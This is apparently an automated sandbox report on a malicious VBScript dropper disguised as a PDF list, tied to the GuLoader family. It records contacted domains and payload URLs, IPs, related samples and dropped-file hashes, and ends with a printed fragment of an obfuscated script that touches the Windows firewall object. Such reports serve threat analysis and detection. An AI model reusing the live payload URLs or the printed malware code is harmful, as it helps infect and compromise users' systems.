                                      https://contoso.com/Licensepowershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.puneet.aepowershell.exe, 00000007.00000002.1667958420.00000263E349B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.ver)svchost.exe, 0000000F.00000002.2759372150.0000020DAEA0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.fornid.compowershell.exe, 00000002.00000002.2756383968.000002DDE1DD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 0000000F.00000003.1801713991.0000020DAE890000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drfalse
                                                high
                                                https://www.ftsengineers.com/it/Kontrastrigt.mso0powershell.exe, 00000007.00000002.1667958420.00000263E2BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fornid.compowershell.exe, 00000002.00000002.2756383968.000002DDE1DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.astenterprises.com.pkpowershell.exe, 00000002.00000002.2756383968.000002DDE1A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://g.live.com/odclientsettings/Prod/C:edb.log.15.drfalse
                                                      high
                                                      http://astenterprises.com.pkpowershell.exe, 00000002.00000002.2756383968.000002DDE1A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.astenterprises.com.pkpowershell.exe, 00000002.00000002.2756383968.000002DDE106C000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.2754994863.0000000004291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://puneet.aepowershell.exe, 00000007.00000002.1667958420.00000263E349B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2836854047.000002DDF05F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2836854047.000002DDF04B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2756383968.000002DDE1E7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.fornid.com/ab/Listpowershell.exe, 00000002.00000002.2756383968.000002DDE1DD0000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2756383968.000002DDE0441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E16B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ftsengineers.com/it/Kontrastrigt.msopowershell.exe, 0000000A.00000002.2754994863.00000000043E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2756383968.000002DDE0441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E16B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2754994863.0000000004291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://fornid.compowershell.exe, 00000002.00000002.2756383968.000002DDE1DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.puneet.aepowershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E33E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  13.107.246.63
                                                                  s-part-0035.t-0009.t-msedge.netUnited States
                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  107.161.23.150
                                                                  astenterprises.com.pkUnited States
                                                                  3842RAMNODEUStrue
                                                                  52.113.195.132
                                                                  s-0005.s-dc-msedge.netUnited States
                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                  209.124.66.28
                                                                  puneet.aeUnited States
                                                                  55293A2HOSTINGUSfalse
                                                                  93.95.216.175
                                                                  fornid.comItaly
                                                                  52030SERVERPLAN-ASITfalse
                                                                  IP
                                                                  127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1571488
                                                                  Start date and time:2024-12-09 13:47:09 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 58s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:21
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:List of required items pdf.vbs
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winVBS@19/18@3/6
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 72
                                                                  • Number of non-executed functions: 11
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .vbs
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 52.109.28.46, 52.109.28.47, 88.221.168.226, 20.42.73.28, 2.22.50.144, 2.22.50.131
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, uks-azsc-000.roaming.officeapps.live.com, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, onedscolp
                                                                  • Execution Graph export aborted for target powershell.exe, PID 4352 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6364 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6880 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: List of required items pdf.vbs
                                                                  TimeTypeDescription
                                                                  07:48:14API Interceptor2320326x Sleep call for process: powershell.exe modified
                                                                  07:48:19API Interceptor1x Sleep call for process: wscript.exe modified
                                                                  07:48:20API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                  07:48:46API Interceptor2x Sleep call for process: svchost.exe modified
                                                                  07:49:49API Interceptor4x Sleep call for process: splwow64.exe modified
                                                                  07:50:05API Interceptor761x Sleep call for process: conhost.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  13.107.246.63Contract Proposal Documents.pdfGet hashmaliciousUnknownBrowse
                                                                  • assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/645a21a8-32ac-ef11-b8e8-6045bd0f229c
                                                                  107.161.23.150List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                      xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse
                                                                        52.113.195.132TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                          Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                            List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                                                Welcome To Raise.emlGet hashmaliciousUnknownBrowse
                                                                                  xi4HNTgb7wewrDQ.docGet hashmaliciousUnknownBrowse
                                                                                    DwocLrf8iK.rtfGet hashmaliciousUnknownBrowse
                                                                                      Structural_Design_Proposal.docx.docGet hashmaliciousUnknownBrowse
                                                                                        2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                          0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                            209.124.66.28https://amdat-my.sharepoint.com/:o:/g/personal/mai_amd_at/EoDy7F40M29Hj1IohtQ4kIQBoQXIpIg2xex0MiXjURHhng?e=a92LfUGet hashmaliciousHTMLPhisherBrowse
                                                                                              https://url.us.m.mimecastprotect.com/s/KCOEC2kqvrf0N8VsnT72v?bWV5ZXJzZXJ2aWNlcw==Get hashmaliciousUnknownBrowse
                                                                                                XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    XXX.wav.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      bg.microsoft.map.fastly.net8ehpti2jSS.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                      • 199.232.210.172
                                                                                                      f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                      • 199.232.214.172
                                                                                                      https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.210.172
                                                                                                      NhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.214.172
                                                                                                      TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 199.232.210.172
                                                                                                      file.exeGet hashmaliciousAveMaria, StormKitty, VenomRATBrowse
                                                                                                      • 199.232.210.172
                                                                                                      s-0005.s-dc-msedge.netTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                      • 52.113.195.132
                                                                                                      Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                      • 52.113.195.132
                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                      • 52.113.195.132
                                                                                                      https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2MGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      Welcome To Raise.emlGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      xi4HNTgb7wewrDQ.docGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      DwocLrf8iK.rtfGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      Structural_Design_Proposal.docx.docGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      PO# BBGR2411PO69.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 52.113.195.132
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      RAMNODEUSList of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                      • 107.161.23.150
                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                      • 107.161.23.150
                                                                                                      owari.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 168.235.88.56
                                                                                                      owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 168.235.65.115
                                                                                                      i486.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 168.235.88.39
                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 107.161.24.95
                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 107.161.24.95
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 167.88.120.84
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 107.161.24.95
                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 107.161.24.95
                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttps://verification.com/omid_error?Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                                                                                      • 150.171.28.10
                                                                                                      PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      Owari.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 20.98.34.196
                                                                                                      Owari.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 20.141.147.191
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                      • 13.107.246.63
                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttps://verification.com/omid_error?Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                                                                                      • 150.171.28.10
                                                                                                      PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 20.233.83.145
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      Owari.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 20.98.34.196
                                                                                                      Owari.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 20.141.147.191
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                      • 13.107.246.63
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      28a2c9bd18a11de089ef85a160da29e4https://verification.com/omid_error?Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      http://154.216.17.157/curl.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      http://doctifyblog.comGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccddeGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.steffe.nu/wp-content/plugins/wats/openfl.php?id=tIP6QK9Y1HOngi2nR2btGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      https://sites.google.com/view/messageimportant09122024/accueilGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0ePYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      9QwZPBACyK.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      enyi.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      http://74.50.69.234/Get hashmaliciousUnknownBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      proforma invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 107.161.23.150
                                                                                                      • 209.124.66.28
                                                                                                      • 93.95.216.175
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      https://www.drvhub.netGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkVision Rat, LummaC Stealer, StealcBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                                                                                                      • 13.107.246.63
                                                                                                      • 52.113.195.132
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.8021949692929868
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAQ:RJE+Lfki1GjHwU/+vVhWqpz
                                                                                                      MD5:CAA3421CBA10DCFDE51D91BDF1AAC8CF
                                                                                                      SHA1:4322D6766E45829B27ECCA829B130146386883EE
                                                                                                      SHA-256:1A0EE721B374E4F557C4FB52ABBBFED5C61C74CA2EEBC581BFC45A2FA2F0915E
                                                                                                      SHA-512:52D64EF5F8A4956B25F2B4EED486955A466E9C1F77F843FEADFB19A9CCA968432519E4D5C30D0679E6ADEDFC84451315088CF880AF83ADE4BED58AC4132ED780
                                                                                                      Malicious:false
                                                                                                      Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf9d18c83, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1048576
                                                                                                      Entropy (8bit):0.9432665412375764
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:TSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:TazaHvxXy2V2UR
                                                                                                      MD5:1061C05BF3A97EF0723E16F2BA9F869A
                                                                                                      SHA1:BF0EC07B305EAB775F8F1011A7A32DFE257C8440
                                                                                                      SHA-256:402AC5230969283FC4272E014640FB2D9B7F5CCE75C18DF1FA2390EBAA9EA82F
                                                                                                      SHA-512:57CB7A795F87083D96D073BCD100E7CA4390B7605C5A610E8CDA42197AD5F5F25E004A4799BEF3B12488DDCF64F2BC140132AD693FF76D83DD070EAA7F33CAF9
                                                                                                      Malicious:false
                                                                                                      Preview:...... ...............X\...;...{......................0.x...... ...{s./0...|Q.h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...................................G.b/0...|o..................dVB/0...|Q..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.08046198523027372
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Sl8Ye9Dk0El/nqlFcl1ZUlllleC30XlAllGBnX/l/Tj/k7/t:S6z9DkVl/qlFclQ/lgicA254
                                                                                                      MD5:DAAC0A3033673A9D47874B06EBF99D76
                                                                                                      SHA1:7601C354865DD283D04F75CB7E0025791CD46E07
                                                                                                      SHA-256:EFAA4F1053706F453E0599E241FAF0A8E1B138B5EA5F1609C936EFBC7A6C24B7
                                                                                                      SHA-512:33E18C34C1C4C787C45F43C330A33879F1D170467A3425C83082080344402F0B005D66751074A64D17A319DA032A6D8ACFC1507F3FEAA9642B33D522AD5E1CC5
                                                                                                      Malicious:false
                                                                                                      Preview:>74......................................;...{../0...|Q.. ...{s.......... ...{s.. ...{s.P.... ...{s..................dVB/0...|Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                      Category:modified
                                                                                                      Size (bytes):8102
                                                                                                      Entropy (8bit):6.568397432820325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:wc8mVrb3UH8QOTLQxizT3W7+p+1iIKoA7Yp4Ns:wc313rDQITMaUARNs
                                                                                                      MD5:76867B70E4722699C523B3DD3EB4524E
                                                                                                      SHA1:2F9C1F14FC0A5CF128D5C98611CA348FFA9F497F
                                                                                                      SHA-256:8725322D24CA83BE5BAB62E530EAD8B32D1EB1FF9F671A5EC0225021D5D90FA3
                                                                                                      SHA-512:2563FB531706A330C63A6E99AF3A2EACF3B3E891D9BD554F230BFC816FBFF7A4436FE15769EA9E89C40053D7F74C4C2C88C2EA5FBAA339171D8974C6122CACB5
                                                                                                      Malicious:true
                                                                                                      Preview:PK..........!.b.h^...........[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J.@.5...*Q>...c[.ii.....B..j7....{2..h.nm....R.....U^.7/...%....rZY...@1.__.f...q..R4D.AJ..h..>....V.....Z.9....NV..8.......ji){^..-I.."{..v^.P!XS)bR.r..K.s(.3.`c..0..........7.M4......Z.k+.|\|z.(...P..6.h_-[.@.!....Pk....2n.}.?..L... ..%......d....dN."m,..DO97*.~...8.O.c.|n.....E........B...!$}.....;{...[.....2........PK..........!..U0#....L......._rels/.rels ...(...................................
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):28687
                                                                                                      Entropy (8bit):5.205131936768175
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:fguDcFaRXMKLd6QLJ3tbuqH3xa0sy5kpXI7JsO1/5+KpKalFZQ:IrocQdXnuqH3c0sy5kpXI1X1/ZKGFK
                                                                                                      MD5:8B310411B49580AE8D67A2ED916BAD17
                                                                                                      SHA1:5EB38F0DA8298D117C1C435246959C90ABE23DA6
                                                                                                      SHA-256:3CF4BCB55CD5A352B25C180ACCE977E652863D8ED09D07335AED81DBC56520F2
                                                                                                      SHA-512:6B1153E6818577A972CD14F94D1E71AF5822E7B8FD993D500FB812521F67458734B93A56875D1AF8B945F8040413B7554E319E716746895D8150DC02F49CFBEC
                                                                                                      Malicious:true
                                                                                                      Preview:....'mazurkaerne indkringsfase reflexives243! triptllers, realisationsprisen35!..........Set Ikld = CreateObject("HNetCfg.FwMgr")....Set residualluftens = Ikld.LocalPolicy.CurrentProfile....'Guruernes artikulatoriskes sparringpartneres lydside:..Set Vandkanterne = residualluftens.ICMPSettings..............'wirehaired thumpers demonstrations! redouter...Private Const Marcellos = 5010..Private Const Overfladernes70 = -30346..Private Const Davrende = -48731..Private Const Bumset = "Nocking. tilbagetrukkenhedens4,"..Private Const Betalingsbetingelses = &HFFFFA3C1..Private Const sadelknappens = -54027..Private Const Abrogators = &HE734..Private Const Coaling = &H43F2..Private Const Pengelnnings = &HFFFFC573..Private Const Beseem10 = "Vairagi: teltningers"..Private Const Defineringens = -60852..Private Const Behags = 1846..Private Const Skibsbestning = &HFFFF5F2B..Private Const overstirred = 9237..Private Const Finmarkene = -1376..Private Const Pigmentophage61 = -63870..Private Const Verdens
                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):165
